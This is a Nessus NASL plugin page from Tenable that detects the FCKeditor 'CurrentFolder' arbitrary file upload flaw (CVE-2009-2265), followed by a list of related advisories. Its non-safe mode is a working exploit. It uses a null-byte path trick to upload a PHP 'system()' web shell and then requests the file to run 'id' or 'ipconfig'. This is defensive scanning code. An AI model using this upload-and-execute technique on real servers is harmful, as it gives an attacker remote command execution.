Lucene search
This script is Copyright (C) 2009-2022 and is owned by Tenable, Inc. or an Affiliate thereof.FCKEDITOR_CURRENTFOLDER_FILE_UPLOAD.NASLHistoryJul 15, 2009 - 12:00 a.m.
FCKeditor 'CurrentFolder' Arbitrary File Upload
2009-07-1500:00:00
This script is Copyright (C) 2009-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
475
FCKeditor is installed on the remote host. It is an open source HTML text editor that is typically bundled with web applications such Dokeos, GForge, Geeklog, and Xoops, although it can also be installed on its own.
The installed version of the software fails to sanitize input passed to the ‘CurrentFolder’ parameter of the ‘upload.php’ script located under ‘editor/filemanager/connectors/php’. Provided PHP’s ‘magic_quotes_gpc’ setting is disabled, an attacker may be able to leverage this issue to upload arbitrary files and execute commands on the remote system.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(39806);
script_version("1.20");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2009-2265");
script_bugtraq_id(31812);
script_xref(name:"SECUNIA", value:"35747");
script_name(english:"FCKeditor 'CurrentFolder' Arbitrary File Upload");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by
an arbitrary file upload vulnerability.");
script_set_attribute(attribute:"description", value:
"FCKeditor is installed on the remote host. It is an open source HTML
text editor that is typically bundled with web applications such
Dokeos, GForge, Geeklog, and Xoops, although it can also be installed
on its own.
The installed version of the software fails to sanitize input passed
to the 'CurrentFolder' parameter of the 'upload.php' script located
under 'editor/filemanager/connectors/php'. Provided PHP's
'magic_quotes_gpc' setting is disabled, an attacker may be able to
leverage this issue to upload arbitrary files and execute commands on
the remote system.");
script_set_attribute(attribute:"see_also", value:"http://ocert.org/advisories/ocert-2009-007.html");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/archive/1/504721/100/0/threaded");
script_set_attribute(attribute:"solution", value:
"Upgrade to FCKeditor 2.6.4.1 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'ColdFusion 8.0.1 Arbitrary File Upload and Execute');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:"CANVAS");
script_cwe_id(22);
script_set_attribute(attribute:"vuln_publication_date", value:"2009/07/03");
script_set_attribute(attribute:"patch_publication_date", value:"2009/07/06");
script_set_attribute(attribute:"plugin_publication_date", value:"2009/07/15");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_MIXED_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2009-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl", "os_fingerprint.nasl");
script_require_keys("www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
os = get_kb_item("Host/OS");
if(os && "Windows" >< os)
{
cmd = "'cmd /c ipconfig /all'";
patmatch = "Windows IP Configuration";
}
else
{
cmd = "id";
patmatch = "uid=[0-9]+.*gid=[0-9]+.*";
}
# Loop through various directories.
# /extension/fckeditor/fckeditor - knowledgeroot
# /lists/admin/FCKeditor - PHPlist
# /main/inc/lib/fckeditor - Dokeos
if (thorough_tests) dirs = list_uniq(make_list("/fckeditor",
"/extension/fckeditor/fckeditor",
"/lists/admin/FCKeditor",
"/main/inc/lib/fckeditor",
"/xampp",
cgi_dirs()));
else dirs = make_list(cgi_dirs());
foreach dir (list_uniq(dirs))
{
dir = string(dir, "/editor/filemanager/connectors/php");
folder_name = str_replace(
find:".nasl",
replace:"-"+unixtime()+".php",
string:SCRIPT_NAME
);
if (safe_checks())
{
url = string(
dir, "/upload.php?",
"Command=FileUpload&",
"Type=File&",
"CurrentFolder=/", folder_name, "%2e"
);
res = http_send_recv3(port:port, method:"GET", item:url);
if (isnull(res)) exit(0);
# If it does and is not disabled...
if (
"OnUploadCompleted" >< res[2] &&
"file uploader is disabled" >!< res[2]
)
{
# Try to generate an error message while uploading a file.
bound = "nessus";
boundary = string("--", bound);
postdata = string(
boundary, "\r\n",
# nb: the filename specified here is irrelevant.
'Content-Disposition: form-data; name="NewFile"; filename=nessus1.txt','\r\n',
"Content-Type: application/zip \r\n",
"\r\n",
'<?php system(', cmd, "); ?>\r\n",
boundary, "--", "\r\n"
);
req = http_mk_post_req(
port : port,
version : 11,
item : url,
add_headers : make_array(
"Content-Type", "multipart/form-data; boundary="+bound
),
data : postdata
);
res = http_send_recv_req(port:port, req:req);
if (isnull(res)) exit(0);
if (
egrep(pattern:"OnUploadCompleted *\( *0",string:res[2]) &&
string(folder_name, ".") >< res[2]
)
{
report = string(
"\n",
"The remote FCKeditor install responded with the following error, while trying to upload a file : ",
"\n\n",
res[2],"\n\n",
"Note that Nessus reported this issue only based on the error message because \n",
"safe checks were enabled for this scan.\n"
);
security_hole(port:port, extra:report);
exit(0);
}
}
}
else
{
url = string(
dir, "/upload.php?",
"Command=FileUpload&",
"Type=File&",
"CurrentFolder=/", folder_name, "%00"
);
res = http_send_recv3(port:port, method:"GET", item:url);
if (isnull(res)) exit(0);
# If it does and is not disabled...
if (
"OnUploadCompleted" >< res[2] &&
"file uploader is disabled" >!< res[2]
)
{
# Try to upload a file to run a command.
bound = "nessus";
boundary = string("--", bound);
postdata = string(
boundary, "\r\n",
# nb: the filename specified here is irrelevant.
'Content-Disposition: form-data; name="NewFile"; filename=nessus1.txt','\r\n',
"Content-Type: application/zip \r\n",
"\r\n",
'<?php system(', cmd, "); ?>\r\n",
boundary, "--", "\r\n"
);
req = http_mk_post_req(
port : port,
version : 11,
item : url,
add_headers : make_array(
"Content-Type", "multipart/form-data; boundary="+bound
),
data : postdata
);
res = http_send_recv_req(port:port, req:req);
if (isnull(res)) exit(0);
pat = string('OnUploadCompleted\\( *0, *"([^"]+/', folder_name, ')');
url2 = NULL;
matches = egrep(pattern:pat, string:res[2]);
if (matches)
{
foreach match (split(matches, keep:FALSE))
{
item = eregmatch(pattern:pat, string:match);
if (!isnull(item))
{
url2 = item[1];
break;
}
}
}
if (isnull(url2)) exit(0);
# Now try to execute the script.
res = http_send_recv3(port:port, method:"GET", item:url2);
if (isnull(res)) exit(0);
if( egrep(pattern:patmatch, string:res[2]))
{
report = string(
"\n",
"Nessus was able to execute the command '", cmd, "' on the remote host,\n",
"which produced the following output :\n",
"\n",
data_protection::sanitize_uid(output:res[2])
);
security_hole(port:port, extra:report);
exit(0);
}
}
}
}
Related
debian
debian
[Backports-security-announce] Security Update for egroupware
2009-08-04 18:52:05
[SECURITY] [DSA 1836-1] New fckeditor packages fix arbitrary code execution
2009-07-16 17:56:04
[Backports-security-announce] Security Update for egroupware
2009-08-04 18:10:26
nessus
nessus
Fedora 10 : moin-1.6.4-3.fc10 (2009-7761)
2009-07-20 00:00:00
Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload
2009-07-14 00:00:00
Debian DSA-1836-1 : fckeditor - missing input sanitising
2010-02-24 00:00:00
fedora
fedora
[SECURITY] Fedora 11 Update: moin-1.8.7-1.fc11
2010-02-20 00:15:56
[SECURITY] Fedora 11 Update: moin-1.8.4-2.fc11
2009-07-19 10:36:56
[SECURITY] Fedora 11 Update: moin-1.8.7-2.fc11
2010-04-09 01:25:29
zdt
zdt
Adobe ColdFusion 8 - Remote Command Execution Exploit
2021-06-25 00:00:00
packetstorm
packetstorm
Adobe ColdFusion 8 Remote Command Execution
2021-06-24 00:00:00
ColdFusion 8.0.1 Arbitrary File Upload And Execute
2010-11-03 00:00:00
securityvulns
securityvulns
[SECURITY] [DSA 1836-1] New fckeditor packages fix arbitrary code execution
2009-07-18 00:00:00
[oCERT-2009-007] FCKeditor input sanitization errors
2009-07-03 00:00:00
openvas
openvas
Fedora Update for moin FEDORA-2010-1743
2010-03-02 00:00:00
Fedora Core 11 FEDORA-2009-7794 (moin)
2009-07-29 00:00:00
Debian Security Advisory DSA 1836-1 (fckeditor)
2009-07-29 00:00:00
cve
cve
CVE-2009-2265
2009-07-05 16:30:00
canvas
canvas
Immunity Canvas: FCKEDITOR
2009-07-05 16:30:00
debiancve
debiancve
CVE-2009-2265
2009-07-05 16:30:00
cvelist
cvelist
CVE-2009-2265
2009-07-05 16:00:00
ubuntucve
ubuntucve
CVE-2009-2265
2009-07-05 00:00:00
prion
prion
Directory traversal
2009-07-05 16:30:00
exploitdb
exploitdb
Adobe ColdFusion 8 - Remote Command Execution (RCE)
2021-06-24 00:00:00
checkpoint_advisories
checkpoint_advisories
seebug
seebug
FCKeditor connectors模块多个跨站脚本及目录遍历漏洞
2009-07-07 00:00:00
Related for FCKEDITOR_CURRENTFOLDER_FILE_UPLOAD.NASL